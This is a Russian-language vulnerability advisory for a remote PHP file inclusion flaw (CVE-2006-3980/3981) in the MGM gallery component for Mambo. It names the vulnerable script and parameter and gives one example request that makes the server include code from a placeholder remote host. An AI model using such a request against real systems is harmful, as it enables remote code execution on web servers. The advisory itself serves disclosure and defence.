PHP-инклюдинг в Mambo MGM

Дата публикации:
03.08.2006
Всего просмотров:
7433
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-3980
CVE-2006-3981
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MGM 0.x (компонент к Mambo)
Уязвимые версии: MGM (компонент Mambo) 0.95r3 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_mgm/help.mgm.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt

URL производителя: mamboxchange.com/projects/mgm

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities

или введите имя

CAPTCHA